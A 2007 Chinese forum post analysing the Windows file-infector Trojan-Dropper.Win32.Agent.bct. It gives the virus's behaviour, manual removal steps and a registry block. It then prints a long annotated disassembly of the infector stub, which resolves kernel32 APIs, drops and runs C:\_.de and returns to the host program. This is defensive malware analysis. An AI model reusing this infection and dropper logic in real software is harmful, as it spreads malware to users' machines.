作者zha0 (zha0)
站內AntiVirus
標題最近大陸那常中的病毒 Trojan-Dropper.Win32.Agent.bct
時間Mon Mar 12 15:59:00 2007
http://blog.uptz.net/article.asp?id=13
這隻跟熊喵一樣,都會感染 *.EXE 不過他是加 Section 的方式,
熊喵是 Binder 的方式。
http://netsecurity.51cto.com/art/200703/41859.htm
-------------------------------------------------
病毒名為:Trojan-Dropper.Win32.Agent.bct
大家小心防範,該病毒會自動感染所有的盤,和前幾個月的那個rose病毒有點相似
當時,我並沒意識到中了毒,只是這兩天上網,覺得沒有個保護措施不行,就好象裸奔一
樣……
今天早上我把360裝上了,然後順手又騙了個卡巴的序列號,裝上了KAV6
升級、重啟……接下來我的機器,不,是卡巴,跟驢叫似的……還不是一頭驢叫,是千驢
萬馬在叫啊!
那真是相當的壯觀!我傻眼了……這麼多?才兩天而已???
再一看,是木馬啊?!沒事……就隨手設置成,發現病毒不詢問直接清理。
等我過一會兒回來看看收成……果然是多收了三五鬥啊!--我頂你個肺!
卡巴它是把病毒找出來了,病毒感染的檔,卡巴連著一起刪除啊!!
E盤和F盤兩個盤近25G的資料啊,軟體啊……只要是exe結尾的……全給卡啦!
我慌了,趕緊上線求助……一看,暈,沒有專殺!目前都是手工刪除……於是找了找他們
的清理辦法,貼上來
大家共同預防,以我為戒!!!千萬不要以為,你的機器可以在internet上裸奔!!千萬要給
機器穿件兒衣服……推薦卡巴或NOD32。
下面是方法:
在系統根目錄生成並運行_.de,生成_.de.bat,自殺
生成x:\windows\system\internat.exe(若先前有同名目錄,則把那個檔夾改名為
internat.exe.tmp)
各盤下生成autorun.inf和setup.exe
運行命令cmd.exe /c dir 系統盤以外的盤:\*.exe /s /b >>C:\WINDOWS\win.log
根據win.log裏的文件來感染EXE
檔感染後增大26890位元組
查殺方法:
1、用命令管理器結束internat.exe這個進程;
2、刪除X:\windows\system\internat.exe;
3、用右鍵進入各盤,刪除下面的autorun.inf和setup.exe;
4、在系統盤根目錄創建一個名為_.de的文件夾;
5、用殺毒軟體徹底掃描全部硬碟,被感染不能修復的刪不刪除都可。
這樣,被感染的EXE雖然還沒修復,但毒是不會復發了的。你可以運行它,慢慢等到殺軟
可以殺它的時候吧。
第二方法:
或把以下內容保存為jy.reg,再雙擊導入
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\internat.exe]
"Debugger"="internat.exe"
這樣,internat.exe就不會運行了
另外,如果已經不幸感染了的,而且被卡巴不分良惡給刪除檔的朋友,請節哀……如果覺
得手工清理後還是不保險的話,等專殺出來吧。只有這樣了,手工清理的話exe結尾的檔
仍然是被感染的……
----
以下是之前分析的 :p
_.de 那個檔案就沒去分析了 >_< 覺得還滿無聊的,沒新的技術 .>_<
0042F716 > 55 PUSH EBP ; alloc stack space & backup register
0042F717 8BEC MOV EBP,ESP
0042F719 83C4 D0 ADD ESP,-30
0042F71C 53 PUSH EBX
0042F71D 56 PUSH ESI
0042F71E 57 PUSH EDI
0042F71F 8D75 FC LEA ESI,DWORD PTR SS:[EBP-4]
0042F722 8B4424 30 MOV EAX,DWORD PTR SS:[ESP+30] ; 從 Stack 取出
Kernel32 Base Address
0042F726 25 0000FFFF AND EAX,FFFF0000
0042F72B 8138 4D5A9000 CMP DWORD PTR DS:[EAX],905A4D ; 判斷是否是 'MZ'
0042F731 74 07 JE SHORT Ra2.0042F73A
0042F733 2D 00100000 SUB EAX,1000 ; 對騎 4K 所以一次 -4K
0042F738 ^EB F1 JMP SHORT Ra2.0042F72B ; Loop
0042F73A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX ; 保留 Kernel32 Base Address
0042F73D E8 C8FFFFFF CALL Ra2.0042F70A ; 取病毒所在的 EIP ( Delta )
0042F742 2D 0A770000 SUB EAX,770A
0042F747 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
0042F74A 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F74C 8B40 3C MOV EAX,DWORD PTR DS:[EAX+3C] ; 取 DOS Stub 裡的 PE
Header Offset
0042F74F 0306 ADD EAX,DWORD PTR DS:[ESI]
0042F751 8B40 78 MOV EAX,DWORD PTR DS:[EAX+78] ; 取 Export Tables 的 RVA
0042F754 0306 ADD EAX,DWORD PTR DS:[ESI]
0042F756 8BC8 MOV ECX,EAX
0042F758 8B51 20 MOV EDX,DWORD PTR DS:[ECX+20]
0042F75B 0316 ADD EDX,DWORD PTR DS:[ESI]
0042F75D 8B59 24 MOV EBX,DWORD PTR DS:[ECX+24]
0042F760 031E ADD EBX,DWORD PTR DS:[ESI]
0042F762 895D F0 MOV DWORD PTR SS:[EBP-10],EBX
0042F765 8B59 1C MOV EBX,DWORD PTR DS:[ECX+1C]
0042F768 031E ADD EBX,DWORD PTR DS:[ESI]
0042F76A 895D EC MOV DWORD PTR SS:[EBP-14],EBX
0042F76D 8B41 18 MOV EAX,DWORD PTR DS:[ECX+18]
0042F770 8BC8 MOV ECX,EAX
0042F772 49 DEC ECX
0042F773 85C9 TEST ECX,ECX
0042F775 72 5A JB SHORT Ra2.0042F7D1
0042F777 41 INC ECX
0042F778 33C0 XOR EAX,EAX
0042F77A 8BD8 MOV EBX,EAX
0042F77C C1E3 02 SHL EBX,2
0042F77F 03DA ADD EBX,EDX
0042F781 8B3B MOV EDI,DWORD PTR DS:[EBX]
0042F783 033E ADD EDI,DWORD PTR DS:[ESI]
判斷是否為 GetProcAddress
0042F785 813F 47657450 CMP DWORD PTR DS:[EDI],50746547
0042F78B 75 40 JNZ SHORT Ra2.0042F7CD
0042F78D 8BDF MOV EBX,EDI
0042F78F 83C3 04 ADD EBX,4
0042F792 813B 726F6341 CMP DWORD PTR DS:[EBX],41636F72
0042F798 75 33 JNZ SHORT Ra2.0042F7CD
0042F79A 8BDF MOV EBX,EDI
0042F79C 83C3 08 ADD EBX,8
0042F79F 813B 64647265 CMP DWORD PTR DS:[EBX],65726464
0042F7A5 75 26 JNZ SHORT Ra2.0042F7CD
0042F7A7 83C7 0C ADD EDI,0C
0042F7AA 66:813F 7373 CMP WORD PTR DS:[EDI],7373
0042F7AF 75 1C JNZ SHORT Ra2.0042F7CD
0042F7B1 8BD0 MOV EDX,EAX
0042F7B3 03D2 ADD EDX,EDX
0042F7B5 0355 F0 ADD EDX,DWORD PTR SS:[EBP-10]
0042F7B8 0FB712 MOVZX EDX,WORD PTR DS:[EDX]
0042F7BB C1E2 02 SHL EDX,2
0042F7BE 0355 EC ADD EDX,DWORD PTR SS:[EBP-14]
0042F7C1 8B12 MOV EDX,DWORD PTR DS:[EDX]
0042F7C3 0316 ADD EDX,DWORD PTR DS:[ESI]
0042F7C5 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
0042F7C8 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
0042F7CB EB 04 JMP SHORT Ra2.0042F7D1
0042F7CD 40 INC EAX
0042F7CE 49 DEC ECX
0042F7CF ^75 A9 JNZ SHORT Ra2.0042F77A ; 找不到 GetProcAddress 就再找
找到後往下執行 ^____^
0042F7D1 8B5D F4 MOV EBX,DWORD PTR SS:[EBP-C]
0042F7D4 8D43 3B LEA EAX,DWORD PTR DS:[EBX+3B] ; LoadLibrary
0042F7D7 50 PUSH EAX
0042F7D8 8B06 MOV EAX,DWORD PTR DS:[ESI] ; KERNEL32 Address Base
0042F7DA 50 PUSH EAX
0042F7DB FF53 04 CALL DWORD PTR DS:[EBX+4] ; Call GetProcAddress
0042F7DE 8943 08 MOV DWORD PTR DS:[EBX+8],EAX ; 保留 LoadLibrary
0042F7E1 8D43 48 LEA EAX,DWORD PTR DS:[EBX+48] ; FreeLibrary
0042F7E4 50 PUSH EAX
0042F7E5 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F7E7 50 PUSH EAX
0042F7E8 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F7EB 8943 0C MOV DWORD PTR DS:[EBX+C],EAX
0042F7EE 8D43 54 LEA EAX,DWORD PTR DS:[EBX+54] ; ExitProcess
0042F7F1 50 PUSH EAX
0042F7F2 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F7F4 50 PUSH EAX
0042F7F5 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F7F8 8943 10 MOV DWORD PTR DS:[EBX+10],EAX
0042F7FB 8D43 60 LEA EAX,DWORD PTR DS:[EBX+60] ; GetModuleHandleA
0042F7FE 50 PUSH EAX
0042F7FF 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F801 50 PUSH EAX
0042F802 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F805 8943 18 MOV DWORD PTR DS:[EBX+18],EAX
0042F808 8D43 34 LEA EAX,DWORD PTR DS:[EBX+34] ; User32
0042F80B 50 PUSH EAX
0042F80C FF53 08 CALL DWORD PTR DS:[EBX+8] ; call LoadLibrary
0042F80F 8BF8 MOV EDI,EAX
0042F811 893B MOV DWORD PTR DS:[EBX],EDI
0042F813 8D43 71 LEA EAX,DWORD PTR DS:[EBX+71] ; GetMessageA
0042F816 50 PUSH EAX
0042F817 57 PUSH EDI ; user32 base address
0042F818 FF53 04 CALL DWORD PTR DS:[EBX+4] ; call GetProcAddress
0042F81B 8943 1C MOV DWORD PTR DS:[EBX+1C],EAX
0042F81E 8D43 7D LEA EAX,DWORD PTR DS:[EBX+7D] ; TranslateMessage
0042F821 50 PUSH EAX
0042F822 8B03 MOV EAX,DWORD PTR DS:[EBX]
0042F824 50 PUSH EAX
0042F825 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F828 8943 20 MOV DWORD PTR DS:[EBX+20],EAX
0042F82B 8D83 8E000000 LEA EAX,DWORD PTR DS:[EBX+8E] ; DispatchMessageA
0042F831 50 PUSH EAX
0042F832 8B03 MOV EAX,DWORD PTR DS:[EBX]
0042F834 50 PUSH EAX
0042F835 FF53 04 CALL DWORD PTR DS:[EBX+4] ; call GetProcAddress
0042F838 8943 24 MOV DWORD PTR DS:[EBX+24],EAX
0042F83B 8D83 9F000000 LEA EAX,DWORD PTR DS:[EBX+9F] ; WinExec
0042F841 50 PUSH EAX
0042F842 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F844 50 PUSH EAX
0042F845 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F848 8943 14 MOV DWORD PTR DS:[EBX+14],EAX
0042F84B 8D83 A7010000 LEA EAX,DWORD PTR DS:[EBX+1A7] ; CreateFileA
0042F851 50 PUSH EAX
0042F852 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F854 50 PUSH EAX
0042F855 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F858 8943 28 MOV DWORD PTR DS:[EBX+28],EAX
0042F85B 8D83 B3010000 LEA EAX,DWORD PTR DS:[EBX+1B3] ; WriteFile
0042F861 50 PUSH EAX
0042F862 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F864 50 PUSH EAX
0042F865 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F868 8943 2C MOV DWORD PTR DS:[EBX+2C],EAX
0042F86B 8D83 BD010000 LEA EAX,DWORD PTR DS:[EBX+1BD] ; CloseHandle
0042F871 50 PUSH EAX
0042F872 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F874 50 PUSH EAX
0042F875 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F878 8943 30 MOV DWORD PTR DS:[EBX+30],EAX
0042F87B 6A 00 PUSH 0
0042F87D 6A 00 PUSH 0
0042F87F 6A 02 PUSH 2
0042F881 6A 00 PUSH 0
0042F883 6A 01 PUSH 1
0042F885 68 000000C0 PUSH C0000000
0042F88A 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7] ; filename C:\_.de
0042F890 50 PUSH EAX
0042F891 FF53 28 CALL DWORD PTR DS:[EBX+28] ; call CreateFileA
0042F894 8BF0 MOV ESI,EAX
0042F896 89B3 FA760000 MOV DWORD PTR DS:[EBX+76FA],ESI
0042F89C 6A 00 PUSH 0
0042F89E 8D83 FE760000 LEA EAX,DWORD PTR DS:[EBX+76FE]
0042F8A4 50 PUSH EAX
0042F8A5 68 31750000 PUSH 7531 ; 檔案長度
0042F8AA 8D83 C9010000 LEA EAX,DWORD PTR DS:[EBX+1C9] ; 要被寫入的檔案
Offset
0042F8B0 50 PUSH EAX
0042F8B1 56 PUSH ESI
0042F8B2 FF53 2C CALL DWORD PTR DS:[EBX+2C] ; call WriteFile
0042F8B5 8B83 FA760000 MOV EAX,DWORD PTR DS:[EBX+76FA] ; Get file handle
0042F8BB 50 PUSH EAX
0042F8BC FF53 30 CALL DWORD PTR DS:[EBX+30] ; call CloseHandle
0042F8BF 6A 01 PUSH 1
0042F8C1 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7]
0042F8C7 50 PUSH EAX
0042F8C8 FF53 14 CALL DWORD PTR DS:[EBX+14] ; call WinExec
0042F8CB 8B83 02770000 MOV EAX,DWORD PTR DS:[EBX+7702] ; 取得原始進入點
的 Base Address
0042F8D1 0383 06770000 ADD EAX,DWORD PTR DS:[EBX+7706] ; 取得原始進入點
的 Entrypoint
0042F8D7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
0042F8DA 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
0042F8DD FFE0 JMP EAX ; 跳到原程式
0042F8DF EB 0E JMP SHORT Ra2.0042F8EF ; WM_QUIT Message-Loop
0042F8E1 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
0042F8E4 50 PUSH EAX
0042F8E5 FF53 20 CALL DWORD PTR DS:[EBX+20] ; call TranslateMessage
0042F8E8 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
0042F8EB 50 PUSH EAX
0042F8EC FF53 24 CALL DWORD PTR DS:[EBX+24] ; call DispatchMessageA
0042F8EF 6A 00 PUSH 0
0042F8F1 6A 00 PUSH 0
0042F8F3 6A 00 PUSH 0
0042F8F5 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
0042F8F8 50 PUSH EAX
0042F8F9 FF53 1C CALL DWORD PTR DS:[EBX+1C] ; ; GetMessageA
0042F8FC 85C0 TEST EAX,EAX
0042F8FE ^75 E1 JNZ SHORT Ra2.0042F8E1
0042F900 5F POP EDI ; free stack space & restore register
0042F901 5E POP ESI
0042F902 5B POP EBX
0042F903 8BE5 MOV ESP,EBP
0042F905 5D POP EBP
0042F906 C3 RETN
0042F907 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
0042F90A 0000 ADD BYTE PTR DS:[EAX],AL
0042F90C 0000 ADD BYTE PTR DS:[EAX],AL
以上把 ice 那段 drop 跟 exec 的翻完了 XD 接下來來看看 _.de 所生出來的檔
案吧 .
_.de AntiVir 掃到為 WORM/Def.BG.3 的病毒 .....
....... <此時人已經回家去了 XDXD>... 所以以下沒東西 CC
--
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 210.64.110.97
※ 編輯: zha0 來自: 210.64.110.97 (03/12 16:02)
※ 編輯: zha0 來自: 210.64.110.97 (03/12 16:03)